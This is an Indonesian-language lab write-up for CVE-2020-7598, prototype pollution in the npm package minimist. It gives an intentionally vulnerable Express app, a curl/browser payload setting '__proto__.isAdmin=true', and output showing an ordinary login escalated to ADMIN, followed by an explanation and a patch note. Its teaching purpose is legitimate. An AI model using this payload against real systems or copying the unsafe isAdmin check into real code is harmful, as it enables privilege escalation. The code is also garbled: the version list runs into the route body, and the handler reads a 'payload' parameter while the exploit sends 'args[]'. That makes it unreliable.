Share
## https://sploitus.com/exploit?id=77F3CAC1-D4FD-528E-BB22-DF4658372850
# CVE-2020-7598 - Prototype Pollution in minimist
## Disclaimer
Project ini dibuat hanya untuk:
- pembelajaran,
- penelitian keamanan,
- dan lab lokal pribadi.
Jangan digunakan terhadap sistem tanpa izin.
---
# Tentang CVE
CVE-2020-7598 adalah vulnerability Prototype Pollution pada package npm:
- minimist
- versi vulnerable:
- `= 1.0.0 {
/*
Ambil raw query
*/
const payload = req.query.payload;
/*
Ubah jadi array argument CLI
*/
const args = payload.split(" ");
console.log("ARGS:", args);
/*
Vulnerable parsing
*/
minimist(args);
console.log("GLOBAL isAdmin:", {}.isAdmin);
res.send("Arguments parsed");
});
/*
Login endpoint
*/
app.post("/login", express.json(), (req, res) => {
const { username, password } = req.body;
const user = users.find(
u =>
u.username === username &&
u.password === password
);
if(!user){
return res.json({
success: false
});
}
console.log("Own property:", user.hasOwnProperty("isAdmin"));
console.log("user.isAdmin:", user.isAdmin);
/*
Vulnerable auth logic
*/
if(user.isAdmin){
return res.json({
success: true,
role: "ADMIN"
});
}
res.json({
success: true,
role: "USER"
});
});
app.listen(3000, () => {
console.log("Server running on port 3000");
});
```
---
# Menjalankan Server
```bash
node app.js
```
Output:
```bash
Server running on port 3000
```
---
# Pengujian Normal
## Login Normal
```bash
curl -X POST http://localhost:3000/login \
-H "Content-Type: application/json" \
-d '{"username":"zen","password":"123"}'
```
Output:
```json
{
"success": true,
"role": "USER"
}
```
---
# Exploit CVE-2020-7598
## Payload Prototype Pollution
Buka browser:
```text
http://localhost:3000/parse?args[]=--__proto__.isAdmin=true
```
ATAU gunakan curl:
```bash
curl "http://localhost:3000/parse?args[]=--__proto__.isAdmin=true"
```
---
# Hasil Exploit
Terminal server:
```bash
GLOBAL isAdmin: true
```
Artinya:
```js
Object.prototype.isAdmin = true
```
berhasil dimodifikasi.
---
# Login Setelah Exploit
```bash
curl -X POST http://localhost:3000/login \
-H "Content-Type: application/json" \
-d '{"username":"zen","password":"123"}'
```
Output:
```json
{
"success": true,
"role": "ADMIN"
}
```
Padahal:
- database tidak berubah,
- source code tidak berubah,
- user tidak memiliki property `isAdmin`.
---
# Mengapa Bisa Menjadi ADMIN?
Code berikut:
```js
if(user.isAdmin)
```
tidak hanya memeriksa property langsung milik object.
JavaScript akan mencari:
1. property milik object,
2. lalu prototype chain.
Karena attacker berhasil memodifikasi:
```js
Object.prototype.isAdmin = true
```
maka seluruh object biasa mewarisi property tersebut.
---
# Bukti Prototype Pollution
Log server:
```bash
Own property: false
user.isAdmin: true
```
Artinya:
- `isAdmin` bukan property asli milik user,
- tetapi diwarisi dari prototype global.
---
# Patch
Versi aman minimist:
```bash
npm install minimist@latest
```
Versi patched memblokir:
- `__proto__`
- `constructor`
- `prototype`
sehingga prototype pollution tidak lagi berhasil.
---
# Referensi
- CVE: CVE-2020-7598
- Package: minimist
- CWE: CWE-1321 Prototype Pollution
---
# Author
Lab dan dokumentasi dibuat untuk kebutuhan pembelajaran keamanan aplikasi Node.js dan prototype pollution research.